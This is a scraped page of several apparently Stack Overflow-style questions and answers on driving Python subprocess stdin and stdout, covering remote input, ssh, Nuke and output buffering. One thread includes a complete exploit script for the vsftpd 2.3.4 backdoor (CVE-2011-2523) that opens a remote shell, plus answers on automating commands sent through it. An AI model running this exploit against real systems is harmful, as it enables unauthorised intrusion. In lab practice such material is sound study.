I have a custom input method and I have a python module to communicate with it. I'm trying to control the shell with it so everything from local stdout is printed on the remote device and everything sent from the remote device goes into local stdin, so that remote device can control the input given to the program, like if there was an input function inside the program the remote device can answer to that too (like in ssh).
I used python subprocess to control the stdin and stdout:
#! /usr/bin/python
from subprocess import Popen, PIPE
import thread
from mymodule import remote_read, remote_write
def talk2proc(dap):
while True:
try:
remote_write(dap.stdout.read())
incmd = remote_read()
dap.stdin.write(incmd)
except Exception as e:
print (e)
break
while True:
cmd = remote_read()
if cmd != 'quit':
p = Popen(['bash', '-c', '"%s"'%cmd], stdout=PIPE, stdin=PIPE, stderr=PIPE)
thread.start_new_thread(talk2proc, (p,))
p.wait()
else:
break
But it doesn't work, what should I do?
p.s.
is there a difference for windows?
I had this problem, I used this for STDIN
from subprocess import call
call(['some_app', 'param'], STDIN=open("a.txt", "rb"))
a.txt
:q
This I used for a git wrapper, this will enter the data line wise whenever there is an interrupt in some_app that is expecting and user input
There is a difference for Windows. This line won't work in Windows:
p = Popen(['bash', '-c', '"%s"'%cmd], stdout=PIPE, stdin=PIPE, stderr=PIPE)
because the equivalent of 'bash' is 'cmd.exe'.
Related
I would like to "automate" a reverse shell given by a script. Let me explain:
Contexte: There is a backdoor on a vulnerable machine.
What am I doing: I create a subprocess which executes a script (python, perl, ...) and which gives me a reverse shell.
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()
What I would like to do: Along with running my script <=> running my reverse shell, I would like to be able to interact with it, using methods.
Today, I am able to write manually in the terminal of my reverse shell: the script that I call with Popen runs and uses the backdoor. This gives me a reverse shell and I can type my commands.
Tomorrow, I would like to be able to call methods during the execution of this reverse shell: I run a script with Popen, it exploits the backdoor and gives me a shell. And rather than typing commands manually, I would like that automatically, a whole series of commands be sent to this reverse shell, and that for each one of them, I be able to recover the returned data.
Ideally, I would like something like that:
backdoor.execute() //This method allow me to get a reverse shell
backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
.
.
backdoor.finish() //This method allow to close the reverse shell
What I tried to do without success: I tried with the Popen class of the subprocess module, to redirect the input and / or the output of the script
Popen(["python", /opt/exploits/backdoor.py, remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
However, when trying to redirect these two streams (or just one of them), my reverse shell closes as quickly as it opened.
I also tried to put my commands directly on the communicate() method:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
I tried this with and without redirection of input and / or output, but nothing worked.
Finally, I tried to use the pexpect module to run my script to get a reverse shell, but I didn't have anything conclusive (maybe I did it wrong).
PS: I cannot change the code of the script that allows me to use the backdoor.
backdoor.py
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
This should work for the single command after a \n is appended and if the -u (unbuffered) option is used. Of course something has to be done with the return value in order to get the command output:
output = Popen(["python", "-u", "/opt/exploits/backdoor.py", remote_ip],
stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami\n")
backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
Provided that
backdoor = Popen(["python", "-u", "backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE)
we can send a command (if you don't want to exit thereafter) with e. g.
backdoor.stdin.write(b"whoami\n")
and get the result of indetermined length with
import select
import os
timeout = 1
while select.select([backdoor.stdout], [], [], timeout)[0]:
print(os.read(backdoor.stdout.fileno(), 4096).decode())
would like to open an ssh session, run commands and get the output real-time as the process runs (this base will involve running additional commands on the remote server)
from subprocess import Popen, PIPE
with Popen(['ssh <server-domain-name>',
],shell=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE,
universal_newlines=True) as ssh:
output1 = ssh.stdin.write('ls -l')
output2 = ssh.stdin.write('mkdir test')
status = ssh.poll()
print(output1)
print(output2)
so far this is what I have, using ssh.communicate[<command>] gives the right output but closes the subproceess after the first command, any thoughts?
worked for me
from fabric2 import Connection
with Connection('<host>') as c:
print(CGREEN +'connected succsfully!' + CEND)
#gather user info
user = io.StringIO
user = c.run("whoami", hide=True)
print(f'user found:{user.stdout} ')
#fetching files
c.run(<command>, pty=True)
The scenario is, I have a Python script which part of it is to execute an external program using the code below:
subprocess.run(["someExternalProgram", "some options"], shell=True)
And when the external program finishes, it requires user to "press any key to exit".
Since this is just a step in my script, it would be good for me to just exit on behalf of the user.
Is it possible to achieve this and if so, how?
from subprocess import Popen, PIPE
p = Popen(["someExternalProgram", "some options"], stdin=PIPE, shell=True)
p.communicate(input=b'\n')
If you want to capture the output and error log
from subprocess import Popen, PIPE
p = Popen(["someExternalProgram", "some options"], stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)
output, error = p.communicate(input=b'\n')
remember that the input has to be a bytes object
I have a python (v3.3) script that runs other shell scripts. My python script also prints message like "About to run script X" and "Done running script X".
When I run my script I'm getting all the output of the shell scripts separate from my print statements. I see something like this:
All of script X's output
All of script Y's output
All of script Z's output
About to run script X
Done running script X
About to run script Y
Done running script Y
About to run script Z
Done running script Z
My code that runs the shell scripts looks like this:
print( "running command: " + cmnd )
ret_code = subprocess.call( cmnd, shell=True )
print( "done running command")
I wrote a basic test script and do *not* see this behaviour. This code does what I would expect:
print("calling")
ret_code = subprocess.call("/bin/ls -la", shell=True )
print("back")
Any idea on why the output is not interleaved?
Thanks. This works but has one limitation - you can't see any output until after the command completes. I found an answer from another question (here) that uses popen but also lets me see the output in real time. Here's what I ended up with this:
import subprocess
import sys
cmd = ['/media/sf_git/test-automation/src/SalesVision/mswm/shell_test.sh', '4', '2']
print('running command: "{0}"'.format(cmd)) # output the command.
# Here, we join the STDERR of the application with the STDOUT of the application.
process = subprocess.Popen(cmd, bufsize=1, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in iter(process.stdout.readline, ''):
line = line.replace('\n', '')
print(line)
sys.stdout.flush()
process.wait() # Wait for the underlying process to complete.
errcode = process.returncode # Harvest its returncode, if needed.
print( 'Script ended with return code of: ' + str(errcode) )
This uses Popen and allows me to see the progress of the called script.
It has to do with STDOUT and STDERR buffering. You should be using subprocess.Popen to redirect STDOUT and STDERR from your child process into your application. Then, as needed, output them. Example:
import subprocess
cmd = ['ls', '-la']
print('running command: "{0}"'.format(cmd)) # output the command.
# Here, we join the STDERR of the application with the STDOUT of the application.
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
process.wait() # Wait for the underlying process to complete.
out, err = process.communicate() # Capture what it outputted on STDOUT and STDERR
errcode = process.returncode # Harvest its returncode, if needed.
print(out)
print('done running command')
Additionally, I wouldn't use shell = True unless it's really required. It forces subprocess to fire up a whole shell environment just to run a command. It's usually better to inject directly into the env parameter of Popen.
I running a subprocess that run a software in "command" mode. (This software is Nuke by The Foundy, in case you know that software)
When in command mode, this software is waiting for user input. This mode allow to create compositing scripts without any UI.
I have done this bit of code that start the process, find when the application is done starting then I try to send the process some commands, but the stdin doesn't seem to be sending the commands properly.
Here the sample code I did to test this process.
import subprocess
appPath = '/Applications/Nuke6.3v3/Nuke6.3v3.app/Nuke6.3v3' readyForCommand = False
commandAndArgs = [appPath, '-V', '-t']
commandAndArgs = ' '.join(commandAndArgs)
process = subprocess.Popen(commandAndArgs,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
shell=True, )
while True:
if readyForCommand:
print 'trying to send command to nuke...'
process.stdin.write('import nuke')
process.stdin.write('print nuke')
process.stdin.write('quit()')
print 'done sending commands'
readyForCommand = False
else:
print 'Reading stdout ...'
outLine = process.stdout.readline().rstrip()
if outLine:
print 'stdout:', outLine
if outLine.endswith('getenv.tcl'):
print 'setting ready for command'
readyForCommand = True
if outLine == '' and process.poll() != None:
print 'in break!'
break
print('return code: %d' % process.returncode)
when I run nuke in a shell and send the same commands here is what I get:
sylvain.berger core/$ nuke -V -t
[...]
Loading /Applications/Nuke6.3v3/Nuke6.3v3.app/Contents/MacOS/plugins/getenv.tcl
>>> import nuke
>>> print nuke
<module 'nuke' from '/Applications/Nuke6.3v3/Nuke6.3v3.app/Contents/MacOS/plugins/nuke/__init__.pyc'>
>>> quit()
sylvain.berger core/$
Any idea why the stdin is not sending the commands properly?
Thanks
your code will send the text
import nukeprint nukequit()
with no newline, thus the python instance will not try to execute anything, everything is just sitting in a buffer waiting for a newline
The subprocess module is not intended for interactive communication with a process. At best, you can give it a single pre-computed standard input string and then read its stdout and stderr:
p = Popen(..., stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = p.communicate(predefined_stdin)
If you actually need interaction, consider using pexpect.